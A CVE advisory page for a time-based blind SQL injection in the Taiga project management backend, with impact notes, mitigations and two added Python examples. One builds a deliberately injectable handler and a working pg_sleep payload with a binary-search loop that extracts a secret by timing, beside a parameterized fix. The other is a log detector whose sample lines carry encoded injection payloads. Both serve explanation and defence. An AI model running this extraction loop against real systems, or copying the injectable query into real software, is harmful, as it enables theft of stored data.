
CVE-2025-62367: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in taigaio taiga-back

Severity: Medium
Tags: Vulnerability, cve, cve-2025-62367, cwe-89
Published: Tue Oct 28 2025 (10/28/2025, 20:06:51 UTC)
Source: CVE Database V5
Vendor/Project: taigaio
Product: taiga-back

Description

Taiga is an open source project management platform. In versions 6.8.3 and earlier, Taiga API is vulnerable to time-based blind SQL injection allowing sensitive data disclosure via response timing. This issue is fixed in version 6.9.0.

AI-Powered Analysis

AI analysis last updated: 10/28/2025, 20:23:20 UTC

Technical Analysis

CVE-2025-62367 is a time-based blind SQL injection (CWE-89, Improper Neutralization of Special Elements used in an SQL Command) in taiga-back, the backend of the Taiga open source project management platform. Versions 6.8.3 and earlier are affected; the fix shipped in 6.9.0. The flaw exists because an API code path incorporates user-supplied input into an SQL query without neutralizing it, so an attacker can change the logic of the query the database executes. The endpoint returns neither database errors nor the injected query's result, which makes the injection blind: the attacker appends a conditional delay (a database sleep function guarded by a condition on the data being targeted) and reads one bit per request from whether the response arrives late, reconstructing sensitive values character by character. The advisory does not name the affected endpoint or parameter. Exploitation requires network access to the API, low privileges (a user account is likely sufficient) and user interaction. The published CVSS v3.1 base score is 4.8 (Medium), combining those metrics with a high confidentiality impact and no impact on integrity or availability; with that vector, 4.8 corresponds to an attack complexity of High (the same vector with low attack complexity scores 5.7), so the flaw is not trivially exploitable even though it leaks data. The issue was published on October 28, 2025. No exploitation in the wild had been reported at the time of analysis.
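The inference described above, as an added illustration that is not taiga-back's code and does not reproduce the CVE's actual injection point (the advisory does not name one): a constructed handler that splices a caller-supplied value into SQL, the parameterized version beside it, and the attacker's loop that recovers a secret using only response time. An in-memory SQLite database stands in for PostgreSQL, with a Python sleep registered under the name pg_sleep so the payload reads as it would against PostgreSQL; the table, column names and secret are all constructed.

```python
"""Time-based blind SQL injection: the inference loop and the parameterized fix.

Added illustration for this advisory, not taiga-back's code. The table, the
column names and the flawed handler are constructed stand-ins; an in-memory
SQLite database stands in for PostgreSQL.
"""
import sqlite3
import time

DELAY = 0.03  # seconds the injected pg_sleep() stalls the query when the guard is true


def make_db():
    """Constructed sample database with one secret the attacker wants to read."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no pg_sleep(); register a Python sleep under that name so the
    # payload below behaves as it would against PostgreSQL.
    conn.create_function("pg_sleep", 1, lambda s: time.sleep(s))
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, api_token TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "tok_a1"), (2, "bob", "s3cr3t")])
    return conn


def vulnerable_lookup(conn, username):
    """Illustrative flawed handler: the caller's value is spliced into the SQL text."""
    sql = f"SELECT id FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, username):
    """Hardened handler: the value is bound as a parameter and is never parsed as SQL."""
    rows = conn.execute("SELECT id FROM users WHERE username = ?", (username,))
    return [row[0] for row in rows]


# Scalar subquery naming the value the attacker wants (hypothetical target).
SECRET = "(SELECT api_token FROM users WHERE username = 'bob')"


def timing_oracle(conn, condition):
    """Answer one yes/no question about the database using only response time.

    The handler returns no rows and no error either way; the only signal is
    whether the guarded pg_sleep() ran.
    """
    payload = f"x' OR (CASE WHEN ({condition}) THEN pg_sleep({DELAY}) ELSE 0 END) --"
    start = time.perf_counter()
    vulnerable_lookup(conn, payload)
    return time.perf_counter() - start > DELAY / 2


def extract_secret(oracle):
    """Rebuild the secret from yes/no answers: binary search on its length, then
    on each character's code point. unicode() is SQLite's spelling of
    PostgreSQL's ascii(); length() and substr() are the same in both."""
    lo, hi = 0, 64
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length({SECRET}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    chars = []
    for pos in range(1, lo + 1):
        c_lo, c_hi = 32, 126
        while c_lo < c_hi:
            mid = (c_lo + c_hi) // 2
            if oracle(f"unicode(substr({SECRET}, {pos}, 1)) > {mid}"):
                c_lo = mid + 1
            else:
                c_hi = mid
        chars.append(chr(c_lo))
    return "".join(chars)


def run_demo():
    """Recover bob's token through the flawed handler using timing alone."""
    conn = make_db()
    return extract_secret(lambda cond: timing_oracle(conn, cond))


if __name__ == "__main__":
    print(run_demo())
```

The point of the binary search is cost: about seven requests per character instead of one per candidate, which is why a blind injection that looks slow on paper still drains a table in minutes. Feeding the same payload to safe_lookup returns nothing and sleeps for nothing, because the bound parameter is compared as a string rather than parsed as SQL.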

Potential Impact

For European organizations using Taiga versions prior to 6.9.0, this vulnerability poses a risk of sensitive data disclosure through exploitation of the SQL injection flaw. This could include project management data, user information, or other confidential business data stored in the backend database. Such data leakage can lead to reputational damage, regulatory non-compliance (e.g., GDPR violations), and potential competitive disadvantage. Since the vulnerability does not affect integrity or availability, direct disruption of services or data manipulation is less likely. However, the exposure of sensitive information can facilitate further attacks such as phishing or social engineering. Organizations relying on Taiga for critical project management or collaboration should prioritize patching to prevent unauthorized data access. The requirement for user interaction and low privileges somewhat limits the attack surface but does not eliminate risk, especially in environments with many users or exposed APIs.

Mitigation Recommendations

1. Upgrade every taiga-back instance to version 6.9.0 or later; this is the only actual fix.
2. Where application code builds SQL itself, replace string concatenation with parameterized queries or ORM query construction. Input validation on API endpoints is defence in depth, not a substitute for parameterization.
3. Deploy a Web Application Firewall (WAF) in front of the API with rules for SQL injection, including time-based patterns such as database sleep functions in parameter values. Treat it as a compensating control until the upgrade lands; WAF rules can be bypassed.
4. Monitor API access logs for a single client sending many requests to the same endpoint with varying parameter values whose response times cluster around a fixed delay; that pattern is characteristic of blind injection probing.
5. Restrict API exposure to trusted networks and authenticated users to reduce the population of potential attackers.
6. Include injection testing of the platform in regular security assessments and penetration tests.
7. Because the CVSS vector requires user interaction, warn users not to follow untrusted links that target the Taiga API.
8. Run the taiga-back database account with least privilege (access limited to its own schema, no superuser or file-access rights) so that a successful injection exposes as little as possible.
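The log monitoring in recommendation 4, as an added example that is not part of the advisory or of Taiga: it scans constructed access-log lines for two signals, explicit delay primitives in a query string and a client sending several distinct slow requests to one path. The log format, the endpoint /api/v1/items and the parameter q are placeholders and are not the endpoint or parameter affected by CVE-2025-62367; the second client deliberately uses a heavy query rather than pg_sleep(), which only the timing signal catches.

```python
"""Detecting blind SQL injection probing in API access logs.

Added example for this advisory, not a Taiga component. The log format,
the endpoint /api/v1/items and the parameter q are constructed placeholders.
Constructed log format (nginx-style with request time appended):
  remote_addr - user [time_local] "request" status body_bytes request_time
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \d+ (?P<rt>\d+(?:\.\d+)?)$'
)
# Signature signal: explicit delay primitives of common SQL engines.
SLEEP_RE = re.compile(r"pg_sleep\s*\(|\bsleep\s*\(|waitfor\s+delay|benchmark\s*\(", re.I)

# Constructed sample lines: one benign slow request (10.0.0.5), a client using
# pg_sleep() (10.0.0.9) and a client using a heavy query as its delay (10.0.0.7).
SAMPLE_LOG = """
10.0.0.5 - alice [28/Oct/2025:20:10:01 +0000] "GET /api/v1/items?project=1&q=roadmap HTTP/1.1" 200 812 0.041
10.0.0.5 - alice [28/Oct/2025:20:10:03 +0000] "GET /api/v1/items?project=1&q=sprint HTTP/1.1" 200 644 2.310
10.0.0.9 - mallory [28/Oct/2025:20:11:00 +0000] "GET /api/v1/items?project=1&q=x'%20AND%20pg_sleep(5)-- HTTP/1.1" 200 2 5.013
10.0.0.9 - mallory [28/Oct/2025:20:11:06 +0000] "GET /api/v1/items?project=1&q=x'%20AND%20(SELECT%20CASE%20WHEN%20ascii(substr(current_user,1,1))>96%20THEN%20pg_sleep(5)%20ELSE%200%20END)=0-- HTTP/1.1" 200 2 5.009
10.0.0.9 - mallory [28/Oct/2025:20:11:12 +0000] "GET /api/v1/items?project=1&q=x'%20AND%20(SELECT%20CASE%20WHEN%20ascii(substr(current_user,1,1))>112%20THEN%20pg_sleep(5)%20ELSE%200%20END)=0-- HTTP/1.1" 200 2 0.038
10.0.0.9 - mallory [28/Oct/2025:20:11:18 +0000] "GET /api/v1/items?project=1&q=x'%20AND%20(SELECT%20CASE%20WHEN%20ascii(substr(current_user,1,1))>104%20THEN%20pg_sleep(5)%20ELSE%200%20END)=0-- HTTP/1.1" 200 2 5.011
10.0.0.7 - trent [28/Oct/2025:20:12:00 +0000] "GET /api/v1/items?project=1&q=x'%20AND%20(SELECT%20count(*)%20FROM%20generate_series(1,20000000))>0-- HTTP/1.1" 200 2 3.420
10.0.0.7 - trent [28/Oct/2025:20:12:09 +0000] "GET /api/v1/items?project=1&q=x'%20AND%20(SELECT%20count(*)%20FROM%20generate_series(1,20000000)%20WHERE%20length(current_user)>4)>0-- HTTP/1.1" 200 2 3.398
10.0.0.7 - trent [28/Oct/2025:20:12:18 +0000] "GET /api/v1/items?project=1&q=x'%20AND%20(SELECT%20count(*)%20FROM%20generate_series(1,20000000)%20WHERE%20length(current_user)>8)>0-- HTTP/1.1" 200 2 0.040
10.0.0.7 - trent [28/Oct/2025:20:12:27 +0000] "GET /api/v1/items?project=1&q=x'%20AND%20(SELECT%20count(*)%20FROM%20generate_series(1,20000000)%20WHERE%20length(current_user)>6)>0-- HTTP/1.1" 200 2 3.401
""".strip().splitlines()


def parse_line(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["rt"] = float(rec["rt"])
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = unquote_plus(url.query)  # decode so signatures see the real SQL
    return rec


def detect(lines, slow_seconds=2.0, min_slow=3):
    """Return findings of two kinds, keyed by (client, path):
    'payload'  - a known delay function appeared in the decoded query string;
    'timing'   - at least `min_slow` distinct slow requests hit the same path.
    Distinct queries matter: a probe changes its condition every request, while a
    legitimately slow page tends to be the same request repeated."""
    sig_hits = defaultdict(int)
    slow_queries = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        if SLEEP_RE.search(rec["query"]):
            sig_hits[key] += 1
        if rec["rt"] >= slow_seconds:
            slow_queries[key].add(rec["query"])
    findings = []
    for (ip, path), n in sorted(sig_hits.items()):
        findings.append({"kind": "payload", "ip": ip, "path": path, "count": n})
    for (ip, path), qs in sorted(slow_queries.items()):
        if len(qs) >= min_slow:
            findings.append({"kind": "timing", "ip": ip, "path": path, "count": len(qs)})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```

Tune slow_seconds to the endpoint's normal latency distribution rather than a fixed number, and keep the signature list as a secondary signal only: the 10.0.0.7 client never mentions a sleep function, and the one request that did not stall (the condition evaluating false) is itself part of the probing pattern, which is why the timing rule counts distinct queries rather than consecutive slow ones.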


Technical Details

Data Version: 5.1
Assigner Short Name: GitHub_M
Date Reserved: 2025-10-10T14:22:48.203Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 690122b38f7e67aef00c128e

Added to database: 10/28/2025, 8:08:19 PM

Last enriched: 10/28/2025, 8:23:20 PM

Last updated: 10/30/2025, 6:01:57 AM

Views: 8

Community Reviews

0 reviews
